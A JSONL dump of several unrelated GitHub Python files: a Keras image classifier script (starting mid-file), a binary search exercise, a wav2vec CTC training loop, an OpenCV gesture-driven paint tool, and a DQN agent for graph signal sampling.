'channels_first':\n input_shape = (3, img_width, img_height)\n else:\n input_shape = (img_width, img_height, 3)\n\n model = create_model(input_shape = input_shape)\n\n model.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n\n train_datagen = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\n test_datagen = ImageDataGenerator(rescale=1. / 255)\n\n train_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='binary')\n\n validation_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='binary')\n\n model.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples / batch_size,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples)\n\n model.save_weights(model_name)\n\n\n\ntrain_data_dir = 'D:\\\\Img_base\\\\Classes\\\\Good_datasets\\\\Data\\\\train'\nvalidation_data_dir = 'D:\\\\Img_base\\\\Classes\\\\Good_datasets\\\\Data\\\\validation'\nweights_path= 'E:\\\\Master_G\\\\Moduls\\\\blonde_35_10_512.h5'\n\ncheck_folder = 'D:\\\\Img_base\\\\Scraping'\njunk_folder = 'D:\\\\Img_base\\\\Scraping_junk'\ncheck_folder_fin = 'D:\\\\Img_base\\\\Scraping\\\\folder'\n\n#train NN\nTrainNN(train_data_dir,validation_data_dir, \"test1000.h5\" )\n'''\nimg_width, img_height = 150, 150\n\nif K.image_data_format() == 'channels_first':\n input_shape = (3, img_width, img_height)\nelse:\n input_shape = (img_width, img_height, 3)\n\nmodel = create_model(input_shape)\nmodel.load_weights(weights_path)\n\n'''\n\n'''\ntest_datagen = ImageDataGenerator(rescale=1. / 255)\n\ncheck_generator = test_datagen.flow_from_directory(\n check_folder,\n target_size=(img_width, img_height),\n batch_size=1,\n class_mode='binary')\n'''\n#output = model.predict_generator(check_generator, steps = 1, max_queue_size=96,workers=1,use_multiprocessing=False, verbose=0)\n#x = image_tools.readImagesAsNumpyArrays(check_folder_fin,150, 150)\n#for item in x:\n# output = model.predict_on_batch(item)\n# print(output)\n\n\n'''\nfiles = os.listdir(check_folder_fin)\nfor file in files:\n if \".jpg\" or \".png\" in str(file):\n path = os.path.join(check_folder_fin, file)\n img = misc.imread(path)\n img = misc.imresize(img, (img_height, img_width))\n img = img * (1. / 255)\n img = img[None, :, :,: ]\n output = model.predict_on_batch(img)\n print(file)\n print(output)\n\n'''\n\n'''\ncounter_a = 0\ncounter_b = 0\nfiles = os.listdir(check_folder_fin)\nfor file in files:\n if \".jpg\" or \".png\" in str(file):\n path = os.path.join(check_folder_fin, file)\n img = misc.imread(path)\n img = misc.imresize(img, (img_height, img_width))\n img = img * (1. / 255)\n img = img[None, :, :,: ]\n output = model.predict_on_batch(img)\n if(output < 0.3):\n counter_a = counter_a + 1\n elif(output > 0.8):\n counter_b = counter_b + 1\nprint(\"counter_a: \")\nprint(counter_a)\nprint(\"counter_b: \")\nprint(counter_b) \n\n#Return list a with true prediction, b - false prediction and c - with idk prediction\ndef ValidateFolderByNNBinary(theModel ,target_folder, threshold_low, threshold_high, img_height = 150, img_width = 150):\n list_a = list()\n list_b = list()\n list_c = list()\n try:\n files = os.listdir(target_folder)\n for file in files:\n if \".jpg\" or \".png\" in str(file):\n path = os.path.join(target_folder, file)\n img = misc.imread(path)\n img = misc.imresize(img, (img_height, img_width))\n img = img * (1. / 255)\n img = img[None, :, :,: ]\n #output = model.predict_on_batch(img)\n output = theModel.predict_on_batch(img)\n if(output <= threshold_low):\n #true\n list_a.append(path)\n elif(output >= threshold_high):\n #false\n list_b.append(path)\n #idk\n else:\n list_c.append(path)\n except Exception as ex:\n logger.LogFromTread(ex.args,'error.log')\n return list_a, list_b, list_c\n\n'''","repo_name":"Vital95/Image-scraping-neural-network","sub_path":"keras_usage.py","file_name":"keras_usage.py","file_ext":"py","file_size_in_byte":6135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"21238456294","text":"def binary_search(array, target, start, end):\n while start <= end:\n mid=(start+end)//2\n if array[mid]==target:\n return mid\n elif array[mid]>target:\n end= mid-1\n else:\n start= mid+1\n return None #while loop 나올 때까지 return 없으면 그냥 찾는 값이 없는 경우\nn, target=list(map(int, input().split()))\narray= list(map(int,input().split()))\n\nresult=binary_search(array, target, 0, n-1)\nif result==None:\n print('찾는 값이 없음')\nelse:\n print(result+1)","repo_name":"ParkIsComing/codingTest","sub_path":"BinarySearch/BinarySearch_Iteration.py","file_name":"BinarySearch_Iteration.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"41295211964","text":"# from model import Net\nfrom cProfile import label\nfrom infer import phonetic_embedding\nfrom transformers import Wav2Vec2ForCTC, Wav2Vec2Processor\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom phonetic_encoder import Phonetic_encoder\nfrom acoustic_encoder import Acoustic_encoder\nfrom linguistic_encoder import Linguistic_encoder\nfrom char_embedding import text_to_tensor\nfrom help import wav_norm, Atention\nimport numpy as np\n# from help import beam_search_decoding\nfrom model import Acoustic_Phonetic_Linguistic\nfrom dataloader import MDD_Dataset\nfrom torch.utils.data import DataLoader\nimport torch.optim as optim\ntokenizer = Wav2Vec2Processor.from_pretrained(\"pretrained_finetuned\")\n\n\"\"\"\n\"\"\"\nf = open(\"/home/tuht/train_wav2vec/loss.txt\", 'a')\ndata = MDD_Dataset()\nprint(data)\nnet = Acoustic_Phonetic_Linguistic()\nnet.to('cuda')\n\nnet = torch.load('/home/tuht/train_wav2vec/MDD_Checkpoint/checkpoint_AdamW_16head_PL.pth')\n# net = net.to('cpu')\ntrain_loader = DataLoader(dataset=data,\n batch_size=1,\n shuffle=True,\n num_workers=0)\n\n\n\n# convert to an iterator and look at one random sample\n\n\nctc_loss = nn.CTCLoss(blank = 95)\n# optimizer = optim.SGD(net.parameters(), lr=0.00001, momentum=0.9)\noptimizer = optim.AdamW(net.parameters(), lr = 0.000001)\n# optimizer = optim.SGD(net.parameters(), 0.01, momentum = 0.9)\n# optimizer = torch.load('/home/tuht/train_wav2vec/MDD_Checkpoint/checkpoint_optim.pth')\nfor epoch in range(15): # loop over the dataset multiple times\n\n running_loss = 0.0\n for i, data in enumerate(train_loader):\n acoustic, phonetic, linguistic, labels = data\n acoustic = acoustic.to('cuda')\n phonetic = phonetic.to('cuda')\n linguistic = linguistic.to('cuda')\n labels = labels.to('cuda')\n optimizer.zero_grad()\n # forward + backward + optimize\n outputs = net(acoustic, phonetic, linguistic)\n outputs = outputs.unsqueeze(1)\n input_lengths = outputs.shape\n target_lengths = labels.shape\n target = labels\n input_lengths = [input_lengths[0]]\n target_lengths =[target_lengths[1]]\n input_lengths = torch.tensor(input_lengths)\n target_lengths = torch.tensor(target_lengths)\n outputs = (F.log_softmax(outputs, dim=2))\n loss = ctc_loss(outputs, labels, input_lengths, target_lengths)\n print(loss)\n f.write(\"(\" +str(epoch+5) + \",\" + str(i) + \")\" + \" loss: \" + str(loss) + \"\\n\") \n loss.backward()\n optimizer.step()\n \n torch.save(net, '/home/tuht/train_wav2vec/MDD_Checkpoint/checkpoint_AdamW_16head_PL.pth')\n # torch.save(optimizer, '/home/tuht/train_wav2vec/MDD_Checkpoint/checkpoint_optim_Adam.pth')\n \nprint('Finished Training')\n","repo_name":"huutuongtu/Deep_Learning_Project","sub_path":"PL/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"6202999802","text":"import tkinter as tk\r\nimport cv2\r\nimport numpy as np\r\nfrom keras.models import load_model\r\nclassifier = load_model(r'E:\\OMKARS\\OMKARS1\\PROJECTS\\PAINT_TOOOL\\complete_code\\SignR_model.h5')\r\nbasepath='E:/OMKARS/OMKARS1/PROJECTS/PAINT_TOOOL/complete_code'\r\n\r\n\r\nwindow=tk.Tk()\r\nfilename = tk.PhotoImage(file = \"E:/OMKARS/OMKARS1/PROJECTS/PAINT_TOOOL/complete_code/paint_sym1.png\")\r\nbackground_label = tk.Label(window, image=filename)\r\nbackground_label.place( relwidth=1, relheight=1)\r\n\r\nwindow.configure(background='white')\r\nw, h = window.winfo_screenwidth(), window.winfo_screenheight()\r\nwindow.geometry(\"%dx%d+0+0\" % (w, h))\r\n#window.grid_rowconfigure(0, weight=1)\r\n#window.grid_columnconfigure(0, weight=1)\r\n\r\nmessage = tk.Label(window, text=\"_\"*9+\"Real Time Paint Tool Box\"+\"_\"*9, bg=\"black\", fg=\"white\", width=100, height=2,\r\n font=(\"Tempus Sans ITC\",19,\"bold\"))\r\n\r\nmessage.place(x=0, y=0)\r\n\r\ndef sign_recognize():\r\n\r\n \r\n classifier = load_model(basepath + '/SignR_model.h5')\r\n\r\n def predictor():\r\n import numpy as np\r\n from keras.preprocessing import image\r\n test_image = image.load_img(basepath + '/1.png', target_size=(64, 64))\r\n test_image = image.img_to_array(test_image)\r\n test_image = np.expand_dims(test_image, axis = 0)\r\n result = classifier.predict(test_image)\r\n \r\n if result[0][0] == 1:\r\n return 'A'\r\n elif result[0][1] == 1:\r\n return 'B'\r\n elif result[0][2] == 1:\r\n return 'C'\r\n elif result[0][3] == 1:\r\n return 'D'\r\n elif result[0][4] == 1:\r\n return 'E'\r\n \r\n cam = cv2.VideoCapture(0)\r\n# update_label(\"Press << c >> for Gesture Detection with Voice\")\r\n\r\n img_text = ''\r\n while True:\r\n ret, frame = cam.read()\r\n frame = cv2.flip(frame,1)\r\n# update_label(\"Press << c >> for Gesture Detection with Voice\")\r\n\r\n l_h = 0\r\n l_s = 0\r\n l_v = 0\r\n u_h = 179 \r\n u_s = 255\r\n u_v = 152 \r\n \r\n img = cv2.rectangle(frame, (425,100),(625,300), (0,255,0), thickness=2, lineType=8, shift=0)\r\n \r\n lower_blue = np.array([l_h, l_s, l_v])\r\n upper_blue = np.array([u_h, u_s, u_v])\r\n imcrop = img[102:298, 427:623]\r\n hsv = cv2.cvtColor(imcrop, cv2.COLOR_BGR2HSV)\r\n mask = cv2.inRange(hsv, lower_blue, upper_blue)\r\n \r\n cv2.putText(frame, img_text, (30, 400), cv2.FONT_HERSHEY_TRIPLEX, 1.5, (0, 255, 0))\r\n paint_win = np.zeros((400, 500, 3), np.uint8) \r\n paint_win.fill(255)\r\n if img_text=='A':\r\n cv2.rectangle(frame,(30,30),(400,400),(255,0,0),2)\r\n cv2.rectangle(paint_win,(30,30),(400,400),(255,0,0),2)\r\n if img_text=='B':\r\n cv2.circle(img,(300,300),100,(0,250,200))\r\n cv2.circle(paint_win,(300,300),100,(0,250,200))\r\n if img_text=='C':\r\n cv2.line(img,(100,100),(400,400),(0,0,2550))\r\n cv2.line(paint_win,(100,100),(400,400),(0,0,2550))\r\n if img_text=='D':\r\n cv2.ellipse(img,(256,256),(100,50),0,0,180,255,-1)\r\n cv2.ellipse(paint_win,(256,256),(100,50),0,0,180,255,-1)\r\n if img_text=='E':\r\n p1 = (100, 200) \r\n p2 = (50, 50) \r\n p3 = (300, 100) \r\n \r\n # Drawing the triangle with the help of lines \r\n # on the black window With given points \r\n # cv2.line is the inbuilt function in opencv library \r\n cv2.line(img, p1, p2, (255, 0, 0), 3) \r\n cv2.line(paint_win, p1, p2, (255, 0, 0), 3) \r\n cv2.line(img, p2, p3, (255, 0, 0), 3) \r\n cv2.line(paint_win, p2, p3, (255, 0, 0), 3) \r\n cv2.line(img, p1, p3, (255, 0, 0), 3)\r\n cv2.line(paint_win, p1, p3, (255, 0, 0), 3)\r\n\r\n cv2.imshow(\"Sign Capture Window\", frame)\r\n cv2.imshow(\"Silhouettes Image\", mask)\r\n cv2.imshow(\"image\", paint_win) \r\n #cv2.waitKey(0)\r\n #if cv2.waitKey(1) == ord('c'):\r\n \r\n img_name = basepath + \"/1.png\"\r\n save_img = cv2.resize(mask, (64, 64))\r\n cv2.imwrite(img_name, save_img)\r\n \r\n # print(\"{} written!\".format(img_name))\r\n img_text = predictor()\r\n# speak.Speak(img_text)\r\n \r\n if cv2.waitKey(1) == ord('c'):\r\n img_text = predictor()\r\n \r\n \r\n if cv2.waitKey(1) == 27:\r\n cam.release()\r\n cv2.destroyAllWindows()\r\n break\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef colour():\r\n import numpy as np\r\n import cv2\r\n from collections import deque\r\n\r\n # Define the upper and lower boundaries for a color to be considered \"Blue\"\r\n blueLower = np.array([100, 60, 60])\r\n blueUpper = np.array([140, 255, 255])\r\n #skin =np.array([231,158,109])\r\n\r\n # Define a 5x5 kernel for erosion and dilation\r\n kernel = np.ones((5, 5), np.uint8)\r\n\r\n # Setup deques to store separate colors in separate arrays\r\n bpoints = [deque(maxlen=512)]\r\n gpoints = [deque(maxlen=512)]\r\n rpoints = [deque(maxlen=512)]\r\n ypoints = [deque(maxlen=512)]\r\n opoints = [deque(maxlen=512)]\r\n vpoints = [deque(maxlen=512)]\r\n ipoints = [deque(maxlen=512)]\r\n bindex = 0\r\n gindex = 0\r\n rindex = 0\r\n yindex = 0\r\n oindex = 0\r\n vindex = 0\r\n iindex = 0\r\n\r\n colors = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (0, 255, 255),(255, 165 , 0),(238 , 130, 238),(75,0 ,130)]\r\n\r\n colorIndex = 0\r\n\r\n # Setup the Paint interface\r\n paintWindow = np.zeros((471, 636, 3)) + 255\r\n paintWindow = cv2.rectangle(paintWindow, (40, 1), (140, 65), (0, 0, 0), 2)\r\n paintWindow = cv2.rectangle(paintWindow, (160, 1), (255, 65), colors[0], -1)\r\n paintWindow = cv2.rectangle(paintWindow, (275, 1), (370, 65), colors[1], -1)\r\n paintWindow = cv2.rectangle(paintWindow, (390, 1), (485, 65), colors[2], -1)\r\n paintWindow = cv2.rectangle(paintWindow, (505, 1), (600, 65), colors[3], -1)\r\n paintWindow = cv2.rectangle(paintWindow, (620, 1), (715, 65), colors[4], -1)\r\n paintWindow = cv2.rectangle(paintWindow, (735, 1), (830, 65), colors[5], -1)\r\n paintWindow = cv2.rectangle(paintWindow, (850, 1), (945, 65), colors[6], -1)\r\n cv2.putText(paintWindow, \"CLEAR ALL\", (49, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 2, cv2.LINE_AA)\r\n cv2.putText(paintWindow, \"BLUE\", (185, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\r\n cv2.putText(paintWindow, \"GREEN\", (298, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\r\n cv2.putText(paintWindow, \"RED\", (420, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\r\n cv2.putText(paintWindow, \"YELLOW\", (520, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (150, 150, 150), 2, cv2.LINE_AA)\r\n cv2.putText(paintWindow, \"ORANGE\", (640,33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 165 , 0),2,cv2.LINE_AA)\r\n cv2.putText(paintWindow, \"VIOOLET\", (762, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 165, 0), 2, cv2.LINE_AA)\r\n cv2.putText(paintWindow, \"INDIGO\", (882, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 165, 0), 2, cv2.LINE_AA)\r\n cv2.namedWindow('Paint', cv2.WINDOW_AUTOSIZE)\r\n\r\n # Load the video\r\n camera = cv2.VideoCapture(0)\r\n\r\n # Keep looping\r\n while True:\r\n # Grab the current paintWindow\r\n (grabbed, frame) = camera.read()\r\n frame = cv2.flip(frame, 1)\r\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n\r\n # Add the coloring options to the frame\r\n frame = cv2.rectangle(frame, (40, 1), (140, 65), (122, 122, 122), -1)\r\n frame = cv2.rectangle(frame, (160, 1), (255, 65), colors[0], -1)\r\n frame = cv2.rectangle(frame, (275, 1), (370, 65), colors[1], -1)\r\n frame = cv2.rectangle(frame, (390, 1), (485, 65), colors[2], -1)\r\n frame = cv2.rectangle(frame, (505, 1), (600, 65), colors[3], -1)\r\n frame = cv2.rectangle(frame, (620, 1), (715, 65), colors[4], -1)\r\n frame = cv2.rectangle(frame, (735, 1), (830, 65), colors[5], -1)\r\n frame = cv2.rectangle(frame, (850, 1), (945, 65), colors[6], -1)\r\n cv2.putText(frame, \"CLEAR ALL\", (49, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\r\n cv2.putText(frame, \"BLUE\", (185, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\r\n cv2.putText(frame, \"GREEN\", (298, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\r\n cv2.putText(frame, \"RED\", (420, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\r\n cv2.putText(frame, \"YELLOW\", (520, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (150, 150, 150), 2, cv2.LINE_AA)\r\n cv2.putText(frame, \"ORANGE\", (640, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 153, 255), 2, cv2.LINE_AA)\r\n cv2.putText(frame, \"VIOLET\", (762, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 153, 255), 2, cv2.LINE_AA)\r\n cv2.putText(frame, \"INDIGO\", (882, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 153, 255), 2, cv2.LINE_AA)\r\n # Check to see if we have reached the end of the video\r\n if not grabbed:\r\n break\r\n\r\n # Determine which pixels fall within the blue boundaries and then blur the binary image\r\n blueMask = cv2.inRange(hsv, blueLower, blueUpper)\r\n blueMask = cv2.erode(blueMask, kernel, iterations=2)\r\n blueMask = cv2.morphologyEx(blueMask, cv2.MORPH_OPEN, kernel)\r\n blueMask = cv2.dilate(blueMask, kernel, iterations=1)\r\n\r\n # Find contours in the image\r\n (ret, cnts, _) = cv2.findContours(blueMask.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\n center = None\r\n\r\n # Check to see if any contours were found\r\n if len(cnts) > 0:\r\n # Sort the contours and find the largest one -- we\r\n # will assume this contour correspondes to the area of the bottle cap\r\n cnt = sorted(cnts, key=cv2.contourArea, reverse=True)[0]\r\n # Get the radius of the enclosing circle around the found contour\r\n ((x, y), radius) = cv2.minEnclosingCircle(cnt)\r\n # Draw the circle around the contour\r\n cv2.circle(frame, (int(x), int(y)), int(radius), (0, 255, 255), 2)\r\n # Get the moments to calculate the center of the contour (in this case Circle)\r\n M = cv2.moments(cnt)\r\n center = (int(M['m10'] / M['m00']), int(M['m01'] / M['m00']))\r\n\r\n if center[1] <= 65:\r\n if 40 <= center[0] <= 140: # Clear All\r\n bpoints = [deque(maxlen=512)]\r\n gpoints = [deque(maxlen=512)]\r\n rpoints = [deque(maxlen=512)]\r\n ypoints = [deque(maxlen=512)]\r\n opoints = [deque(maxlen=512)]\r\n vpoints = [deque(maxlen=512)]\r\n ipoints = [deque(maxlen=512)]\r\n bindex = 0\r\n gindex = 0\r\n rindex = 0\r\n yindex = 0\r\n oindex = 0\r\n vindex = 0\r\n iindex = 0\r\n\r\n\r\n paintWindow[67:, :, :] = 255\r\n elif 160 <= center[0] <= 255:\r\n colorIndex = 0 # Blue\r\n elif 275 <= center[0] <= 370:\r\n colorIndex = 1 # Green\r\n elif 390 <= center[0] <= 485:\r\n colorIndex = 2 # Red\r\n elif 505 <= center[0] <= 600:\r\n colorIndex = 3 # Yellow\r\n elif 620 <= center[0] <= 715:\r\n colorIndex = 3 # Orange\r\n elif 735 <= center[0] <= 830:\r\n colorIndex = 3 # Violet\r\n elif 850 <= center[0] <= 945:\r\n colorIndex = 3 # Indigo\r\n else:\r\n if colorIndex == 0:\r\n bpoints[bindex].appendleft(center)\r\n elif colorIndex == 1:\r\n gpoints[gindex].appendleft(center)\r\n elif colorIndex == 2:\r\n rpoints[rindex].appendleft(center)\r\n elif colorIndex == 3:\r\n ypoints[yindex].appendleft(center)\r\n elif colorIndex ==4:\r\n opoints[oindex].apppendleft(center)\r\n elif colorIndex ==5:\r\n vpoints[vindex].apppendleft(center)\r\n elif colorIndex == 6:\r\n ipoints[iindex].apppendleft(center)\r\n # Append the next deque when no contours are detected (i.e., bottle cap reversed)\r\n else:\r\n bpoints.append(deque(maxlen=512))\r\n bindex += 1\r\n gpoints.append(deque(maxlen=512))\r\n gindex += 1\r\n rpoints.append(deque(maxlen=512))\r\n rindex += 1\r\n ypoints.append(deque(maxlen=512))\r\n yindex += 1\r\n opoints.append(deque(maxlen=512))\r\n oindex += 1\r\n vpoints.append(deque(maxlen=512))\r\n vindex += 1\r\n ipoints.append(deque(maxlen=512))\r\n iindex += 1\r\n\r\n # Draw lines of all the colors (Blue, Green, Red and Yellow)\r\n points = [bpoints, gpoints, rpoints, ypoints,opoints,vpoints,ipoints]\r\n for i in range(len(points)):\r\n for j in range(len(points[i])):\r\n for k in range(1, len(points[i][j])):\r\n if points[i][j][k - 1] is None or points[i][j][k] is None:\r\n continue\r\n cv2.line(frame, points[i][j][k - 1], points[i][j][k], colors[i], 2)\r\n cv2.line(paintWindow, points[i][j][k - 1], points[i][j][k], colors[i], 2)\r\n\r\n # Show the frame and the paintWindow image\r\n cv2.imshow(\"Tracking\", frame)\r\n cv2.imshow(\"Paint\", paintWindow)\r\n\r\n # If the 'q' key is pressed, stop the loop\r\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\r\n camera.release()\r\n break\r\n\r\n # Cleanup the camera and close any open windows\r\n camera.release()\r\n cv2.destroyAllWindows()\r\n\r\n\r\n\r\n\r\n\r\ndef Write():\r\n from subprocess import call\r\n call([\"python\", \"Write.py\"])\r\n\r\n\r\ndef new_rec():\r\n # Python3 program to draw rectangle\r\n # shape on solid image\r\n import numpy as np\r\n import cv2\r\n\r\n # Creating a black image with 3\r\n # channels RGB and unsigned int datatype\r\n img = np.zeros((400, 400, 3), dtype=\"uint8\")\r\n\r\n # Creating rectangle\r\n cv2.rectangle(img, (60, 30), (300, 200), (255, 255, 255), 5)\r\n\r\n cv2.imshow('dark', img)\r\n\r\n # Allows us to see image\r\n # untill closed forcefully\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\nShape = tk.Label(window, text=\"--SHAPES--\", fg=\"black\", bg=\"cyan\", width=20, height=2,\r\n font=(\"Tempus Sans ITC\",15,\"bold\"))\r\nShape.place(x=130, y=200)\r\n\r\n\r\n\r\n\r\n\r\n\r\nshape = tk.Button(window, text=\"Shape\", command=sign_recognize, fg=\"black\", bg=\"green yellow\", width=20, height=2,\r\n font=(\"Tempus Sans ITC\",15,\"bold\"))\r\nshape.place(x=1000, y=600)\r\n\r\nOps = tk.Label(window, text=\"--OPERATIONS--\", fg=\"black\", bg=\"green yellow\", width=20, height=2,\r\n font=(\"Tempus Sans ITC\",17,\"bold\"))\r\nOps.place(x=965, y=200)\r\n\r\ncolour = tk.Button(window, text=\"Colour\", command=colour, fg=\"black\", bg=\"green yellow\", width=20, height=2,\r\n font=(\"Tempus Sans ITC\",15,\"bold\"))\r\ncolour.place(x=1000, y=300)\r\n\r\n\r\nWrite = tk.Button(window, text=\"Write\", command=Write, fg=\"black\", bg=\"green yellow\", width=20, height=2,\r\n font=(\"Tempus Sans ITC\",15,\"bold\"))\r\nWrite.place(x=1000, y=500)\r\n\r\n\r\n\r\nwindow.mainloop()","repo_name":"priyankawadle/Real_Time_PaintTool_Box","sub_path":"Paint.py","file_name":"Paint.py","file_ext":"py","file_size_in_byte":15629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"44567925147","text":"import itertools\nfrom datetime import datetime\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.contrib.layers as layers\nfrom gym.spaces import Box, MultiBinary, Discrete\nfrom baselines import deepq, logger\nfrom baselines.common import tf_util\nfrom baselines.common.schedules import LinearSchedule\nfrom baselines.deepq.replay_buffer import ReplayBuffer\n\nfrom algorithms.recovery import sparse_label_propagation\nfrom graph_functions import nmse, random_walk_error\nfrom utils import TIMESTAMP_FORMAT, dump_pickle\nfrom visualization import draw_partitioned_graph\nfrom envs import GraphSamplingEnv, SimpleThreeClusterEnv\n\ndef model_fn(inpt, num_actions, scope, reuse=False):\n \"\"\"This model takes as input an observation and returns values of all\n actions.\n \"\"\"\n with tf.variable_scope(scope, reuse=reuse):\n out = inpt\n out = layers.fully_connected(out,\n num_outputs=50,\n activation_fn=tf.nn.relu)\n out = layers.fully_connected(out,\n num_outputs=num_actions,\n activation_fn=None)\n return out\n\nclass BaseAgent(object):\n def __init__(self,\n env,\n gamma=0.99,\n learning_rate=5e-4,\n replay_buffer_size=500000,\n exploration_schedule_steps=1000000,\n exploration_initial_prob=1.0,\n exploration_final_prob=0.02,\n random_walk_sampling_args=None):\n self.env = env\n self._gamma = gamma\n self._learning_rate = learning_rate\n self._replay_buffer_size = replay_buffer_size\n self._exploration_schedule_steps = exploration_schedule_steps\n self._exploration_final_prob = exploration_final_prob\n self._exploration_initial_prob = exploration_initial_prob\n self._random_walk_sampling_args = random_walk_sampling_args\n self._build_train()\n self.session = tf_util.make_session(1)\n\n def _observation_ph_generator(self, name):\n env = self.env\n\n if isinstance(env.observation_space, (MultiBinary, Discrete)):\n batch_shape = (env.observation_space.n,)\n elif isinstance(env.observation_space, Box):\n batch_shape = env.observation_space.shape\n else:\n raise ValueError(\"Unexpected observation space\")\n\n return tf_util.BatchInput(batch_shape, name=name)\n\n def _build_train(self):\n env = self.env\n\n act, train, update_target, debug = deepq.build_train(\n make_obs_ph=self._observation_ph_generator,\n q_func=model_fn,\n num_actions=env.action_space.n,\n optimizer=tf.train.AdamOptimizer(learning_rate=self._learning_rate),\n gamma=self._gamma\n )\n\n self.act = act\n self.train = train\n self.update_target = update_target\n self.debug = debug\n\n def learn(self):\n act = self.act\n train = self.train\n update_target = self.update_target\n\n\n env = self.env\n with self.session.as_default():\n replay_buffer = ReplayBuffer(self._replay_buffer_size)\n exploration = LinearSchedule(\n schedule_timesteps=self._exploration_schedule_steps,\n initial_p=self._exploration_initial_prob,\n final_p=self._exploration_final_prob)\n\n tf_util.initialize()\n update_target()\n\n episode_rewards = [0.0]\n episode_errors = []\n episode_rw_errors = []\n episode_error_diffs = []\n observation = env.reset()\n\n for t in itertools.count():\n # Take action and update exploration to the newest value\n action = act(observation[None], update_eps=exploration.value(t))[0]\n new_observation, reward, done, _ = env.step(action)\n # Store transition in the replay buffer.\n replay_buffer.add(observation, action, reward,\n new_observation, float(done))\n observation = new_observation\n\n episode_rewards[-1] += reward\n\n if done:\n episode_errors.append(env.error)\n episode_rewards.append(0)\n if self._random_walk_sampling_args is not None:\n sampling_args = self._random_walk_sampling_args\n sampling_args.update({\"graph\": env.graph})\n rw_error = random_walk_error(sampling_args)\n episode_rw_errors.append(rw_error)\n episode_error_diffs.append(rw_error - env.error)\n\n if len(episode_rewards) % 10 == 0:\n nmse = env.get_current_nmse()\n logger.record_tabular(\"steps\", t)\n logger.record_tabular(\"episodes\", len(episode_rewards))\n logger.record_tabular(\"mean episode reward\",\n round(np.mean(episode_rewards[-101:-1]), 3))\n logger.record_tabular(\"mean episode error\",\n round(np.mean(episode_errors[-101:-1]), 3))\n logger.record_tabular(\"nmse\", nmse)\n logger.record_tabular(\"sampling set\",\n [int(v) for v in env.sampling_set])\n logger.record_tabular(\"% time spent exploring\",\n int(100 * exploration.value(t)))\n if self._random_walk_sampling_args is not None:\n logger.record_tabular(\"mean random walk error\", round(np.mean(\n episode_rw_errors[-101:-1]), 3))\n logger.record_tabular(\"mean error diff\",\n round(np.mean(episode_error_diffs[-101:-1]), 3))\n logger.dump_tabular()\n\n observation = env.reset()\n\n # Minimize the Bellman equation error on replay buffer sample batch\n if t > 1000:\n (observations_t, actions, rewards,\n observations_tp1, dones) = replay_buffer.sample(32)\n train(observations_t, actions, rewards,\n observations_tp1, dones, np.ones_like(rewards))\n if t % 1000 == 0:\n # Update target network periodically.\n update_target()\n\n def test(self):\n env = self.env\n act = self.act\n train = self.train\n update_target = self.update_target\n\n with self.session.as_default():\n observation, done = env.reset(), False\n while not done:\n action = act(observation[None], update_eps=0.9)[0]\n observation, reward, done, _ = env.step(action)\n\n nmse = env.get_current_nmse()\n print(\"nmse: \", nmse)\n","repo_name":"hartikainen/rl-graph-signal-recovery","sub_path":"agents/base_agent.py","file_name":"base_agent.py","file_ext":"py","file_size_in_byte":6247,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"91"}
